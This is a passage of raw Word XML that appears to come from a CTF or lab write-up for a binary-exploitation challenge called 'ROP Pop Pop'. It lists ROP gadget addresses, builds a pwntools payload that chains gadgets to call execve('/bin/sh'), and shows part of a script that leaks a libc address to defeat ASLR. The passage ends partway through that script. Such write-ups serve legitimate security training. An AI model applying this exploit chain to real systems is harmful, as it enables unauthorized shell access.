      </w:tblGrid>
      <w:tr w:rsidR="00387AFC" w14:paraId="40D59101" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="18CC8426" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRDI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C33CDB" w14:textId="62D796DA" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C27E78" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRSI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1576E0" w14:textId="43A215B9" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B285BA3" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBC6E04" w14:textId="1A3F70AC" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C28AF73" w14:textId="454783C6" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Binary Gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63412003" w14:textId="2485343F" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>These are almost the same as the RDI, RSI, and RET gadgets used in Inspector. The popRSI gadget has an extra pop, so the payload will have to include some junk data to pop into r15 before the gadget returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A3CB7" w14:textId="0A7C135D" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>The following gadgets are in libC</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00387AFC" w14:paraId="6F5638A8" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="33235E4F" w14:textId="296B9334" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRD</w:t>
            </w:r>
            <w:r>
              <w:t>X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2EDFEB" w14:textId="1143F61A" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000000fd6bd : pop rdx ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E23D18" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRAX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D009F0D" w14:textId="19E2CEB6" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x000000000003f587 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605135BD" w14:textId="5F6E5594" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3142EBA0" w14:textId="614473AA" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x0000000000026468 : syscall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59C87593" w14:textId="1527AED1" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Libc.so.6 Gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA1711" w14:textId="7956F8ED" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>The gadget data is almost the same as that for inspector. The string “/bin/sh” can be found</w:t>
      </w:r>
      <w:r w:rsidRPr="00387AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00387AFC">
        <w:t>0x0019604f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines into libc.so.6, so it’s address will be equal to that value plus the libC base address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE23C9E" w14:textId="3662FED9" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>The full payload builder is below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00387AFC" w14:paraId="0CFD1067" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="11639D40" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def pwnPLD_libc6(libcBase):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359464A9" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E67B04" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0A1734" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Gadgets in Binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6728FC0E" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5AA0F2" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DD210E" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B49F851" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRSI = p64(0x004006b1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC81A5B" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA81A94" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E1093FB" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D09D375" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D021017" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t># Gadgets in Library</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432FFB14" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000000fd6bd : pop rdx ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22BFF500" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x00fd6bd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3926C676" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("popRDX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F985EF5" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRDX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337F986C" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x000000000003f587 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410742A6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x003f587</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E94A4DC" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("popRAX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37855B7F" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRAX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1213ED3C" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x0000000000026468 : syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2180BEF6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x0026468</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632AA4A1" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("syscall - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FA9657" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>syscall = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2966905A" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EBC9334" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Data for the stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036808D0" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># /bin/sh address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4926BBA6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>binSh = libcBase + 0x0019604f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF9AFF6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRDI = p64(binSh)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE05659" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRSI = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5D500D" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>junk = p64(0xdeadbeef)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D4D3A5" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRDX = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C84160" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRAX = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39077A6A" w14:textId="5EB9E443" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF0122A" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF5D769" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + datRDI + popRSI + datRSI + junk + popRDX + datRDX + popRAX + datRAX + syscall + retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1C97EC" w14:textId="58072611" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="636B06D3" w14:textId="697C4041" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payload for LibC6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68263801" w14:textId="10E5524F" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>If the values are correct, this payload should result in a ROP chain that will open a shell by calling execve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D43434" w14:textId="3F2F09EA" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t>To successfully pwn ROP Pop Pop, the script should send a payload that will leak the gets address and then return to the beginning of the program main method. The script will use the output value to calculate the libC base address and gadget addresses, before sending a second payload that will use those addresses to open a system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AFA9D" w14:textId="1BF3C69B" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00066F5F">
      <w:r>
        <w:t xml:space="preserve">The following script </w:t>
      </w:r>
      <w:r w:rsidR="00B024C7">
        <w:t>takes in a process/connection, sends the first payload to leak the addresses, calculates the libC base address, then sends that to the payload builder above which calculates the correct addresses for the ROP chain. Then the program sends the new payload to rop before opening an interactive session.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00387AFC" w14:paraId="322AD4E5" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2E43A2DD" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def pwnLocal(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CBB4D3" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E4F9DC" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33526CD3" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C25B6D0" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.sendline(mainLinePld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE33370" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.recvuntil("Breakpoint")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20391C7E" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A06C838" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013BD9E6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.sendline("c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7022FFF4" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C224B6" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78071CE0" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EBB782" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44EBD310" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260CE8AD" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="584702D9" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7151AA55" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># There's an extra a at the beginning for no reason</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65008500" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>leak -= 0xa000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFB303B" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("gots leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42764277" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DE0B2CF" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#libcBase = leak - 0xf7a50 + 0x100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40389866" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>libcBase = leak - 0x75050</w:t>
            </w:r>
          </w:p>
